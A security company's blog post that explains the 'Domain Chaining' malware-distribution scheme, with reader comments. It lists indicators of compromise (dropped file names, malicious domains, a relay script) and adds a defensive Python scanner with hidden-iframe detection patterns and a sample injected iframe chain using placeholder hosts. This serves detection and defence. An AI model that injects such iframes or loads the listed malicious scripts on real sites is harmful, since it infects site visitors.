• Domain Chaining Attacks

    Malicious hackers are constantly changing tactics in order to evade detection. One of the relatively new mechanisms that has been used to infect thousands of websites on the Internet is known as Domain Chaining.

    Domain Chaining is the use of multiple malware-infected domains as a network that feeds exploit code to legitimate, benign websites that have been compromised. It lets malicious hackers reliably push exploit code to thousands of compromised websites, infecting the sites themselves and, in turn, their visitors.

    What is a Domain Chaining attack?
    Domain Chaining attacks have been on the rise since the beginning of this year.

    The basic concept is as follows:

    1. Malicious hackers register multiple websites specifically to spread malware. This malware may exploit browser vulnerabilities to infect visitors’ computers, or it may redirect unsuspecting users to websites that prompt them to install fake anti-virus software on their computers.
    2. As in traditional attacks, the malicious hackers use a network of compromised but legitimate websites, in addition to the dedicated malware-distribution websites they registered, to spread their malware widely across the Internet.

    Why do malicious hackers use this approach?
    There are a few benefits to this mechanism. The first is that signature-based and honeypot-based detection systems find it difficult to home in on the actual source of the malware; they tend to identify only the distribution points. Another “benefit” is what can be called “failover.”

    We have blogged about hackers’ understanding of the necessity of failover in the past. If a security organization identifies one website in the malware chain as dangerous and manages to shut it down, the distribution of the actual exploit to website visitors does not stop, because a number of other websites continue to act as distribution points. Think of it as a multi-headed Hydra.

    How do I know if my site is infected?
    If your website is part of this Domain Chaining attack, it will most likely contain one of these files:

    script.php
    cssminibar.js
    sidename.js
    jtoolsmini.js
    tempjs.js
    js.php
    jstools.js

    A file name on its own is a weak indicator, since names change between variants; confirm an infection by checking what the file actually loads, as described next.
    

    What do these files do?
    These scripts load code from infected websites that harbor malicious iframes. The malicious iframes in turn load exploit code from the maliciously registered sites.

    Maliciously registered sites related to this attack:

    brkfnrmnk.co.cc
    brlgnknc.co.cc
    

    Maliciously registered sites related to previous Domain Chaining attacks:

    klubnika34his.com
    bogdantevye.ru
    jwjmusic.cx.cc
    frankieeus.ru
    gaufridboris.ru
    stephanos.ru
    

    The malicious content is primarily distributed by a file named “wpqonfig.php”, which redirects iframe and script requests to a maliciously registered website.

    What script is used in the current attacks?
    The latest version of this Domain Chaining attack uses the following script:

    nbnjkl.com/urchin.js

    Note that the file name mimics the legacy Google Analytics tracking script (urchin.js), so a reference to it does not look out of place in a page; check the host it is loaded from, not just the name.
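
    The following scanner is an added example and is not StopTheHacker’s own tooling. It turns the indicators listed above (the dropped file names, wpqonfig.php, and the registered domains) into two checks: it walks a web root and flags files by name, by references to the listed domains in script or iframe src attributes, and by a hidden-iframe heuristic (zero size or display:none, which is an assumption about how such iframes are usually injected, not a detail from this post); and it follows a script/iframe reference chain through a caller-supplied fetch function, stopping before it would request the exploit host. The sample chain is constructed for the example: victim.example and relay.example are placeholder hosts, while nbnjkl.com/urchin.js is the script named above.

```python
"""Indicator scan for the Domain Chaining infection described in this post.
Added example, not StopTheHacker's tooling; hostnames in the sample are
placeholders except nbnjkl.com, which the post names."""
import os
import re
from urllib.parse import urljoin, urlsplit

# File names the post lists for infected sites, plus the wpqonfig.php relay.
IOC_FILENAMES = {
    "script.php", "cssminibar.js", "sidename.js", "jtoolsmini.js",
    "tempjs.js", "js.php", "jstools.js", "wpqonfig.php",
}
# Domains the post attributes to this and earlier campaigns.
IOC_DOMAINS = {
    "brkfnrmnk.co.cc", "brlgnknc.co.cc", "klubnika34his.com",
    "bogdantevye.ru", "jwjmusic.cx.cc", "frankieeus.ru",
    "gaufridboris.ru", "stephanos.ru", "nbnjkl.com",
}
SCAN_EXTENSIONS = {".html", ".htm", ".php", ".js"}
# src="..." on <script>/<iframe>, also inside document.write('<iframe ...>').
_SRC_RE = re.compile(
    r"<(script|iframe)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
# Assumption (not from the post): injected iframes are zero-sized or hidden.
_HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*(width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b|display\s*:\s*none)",
    re.IGNORECASE)

def extract_refs(content):
    """(tag, src) for every script/iframe src attribute in content."""
    return [(m.group(1).lower(), m.group(2)) for m in _SRC_RE.finditer(content)]

def domain_of(url):
    """Host of an absolute or scheme-relative URL; '' for a relative path."""
    if "//" not in url:
        return ""
    return (urlsplit(url).hostname or "").lower()

def scan_file(path, content):
    """Reasons this file looks like part of the chain (empty list if clean)."""
    reasons = []
    if os.path.basename(path).lower() in IOC_FILENAMES:
        reasons.append("dropped-file-name")
    for tag, src in extract_refs(content):
        if domain_of(src) in IOC_DOMAINS:
            reasons.append("%s-src-ioc-domain:%s" % (tag, domain_of(src)))
    if _HIDDEN_IFRAME_RE.search(content):
        reasons.append("hidden-iframe")
    return reasons

def iter_tree(root):
    """Yield (relative path, content) for each file worth scanning under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if name.lower() in IOC_FILENAMES or ext in SCAN_EXTENSIONS:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    yield os.path.relpath(full, root), fh.read()

def scan_entries(entries):
    """{path: reasons} for each (path, content) pair that looks infected."""
    findings = {}
    for path, content in entries:
        reasons = scan_file(path, content)
        if reasons:
            findings[path] = reasons
    return findings

def follow_chain(start_url, fetch, max_hops=8):
    """Breadth-first walk of script/iframe refs; fetch(url) -> body or None.
    Returns (urls in visit order, first IOC domain hit or None) and stops
    before requesting the exploit host itself."""
    hops, seen, queue = [], set(), [start_url]
    while queue and len(hops) < max_hops:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        hops.append(url)
        if domain_of(url) in IOC_DOMAINS:
            return hops, domain_of(url)
        for _tag, src in extract_refs(fetch(url) or ""):
            queue.append(urljoin(url, src))
    return hops, None

# Constructed sample chain: victim page -> dropped JS -> relay -> exploit host.
SAMPLE_PAGES = {
    "http://victim.example/index.php":
        '<html><body>Hi<script src="/cssminibar.js"></script></body></html>',
    "http://victim.example/cssminibar.js":
        "document.write('<iframe src=\"http://relay.example/wpqonfig.php\" "
        "width=0 height=0></iframe>');",
    "http://relay.example/wpqonfig.php":
        '<script src="http://nbnjkl.com/urchin.js"></script>',
}

if __name__ == "__main__":
    print(scan_entries(iter_tree(os.environ.get("WEBROOT", "."))))
    print(follow_chain("http://victim.example/index.php", SAMPLE_PAGES.get))
```

    Run it with WEBROOT pointing at the document root to be checked; the second line of output traces the constructed sample chain from the victim page through the dropped cssminibar.js and the wpqonfig.php relay until it reaches nbnjkl.com. To trace a real chain, pass a fetch function that retrieves pages from an isolated network, since every hop before the final one is an attacker-controlled site.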
    

    How do I protect my site?
    Malicious hackers are constantly changing their tactics in order to evade detection and to keep infecting unsuspecting users. It is imperative to keep up to date on the latest ways that infections are spreading to legitimate websites.

    StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…

    • Thank you for the article.
      I learn a lot from your website regarding the security of my websites. :)
      Keep up the good work!

      Posted by Joyabo on October 19th

    • What do you think are the techniques attackers are using to get “thousands of compromised websites” to distribute their malware? Mass SQL injection? RFI, LFI? XSS?

      Posted by Lukas on October 29th

    • Primarily SQL Injection and stolen FTP passwords

      Posted by anirban on November 2nd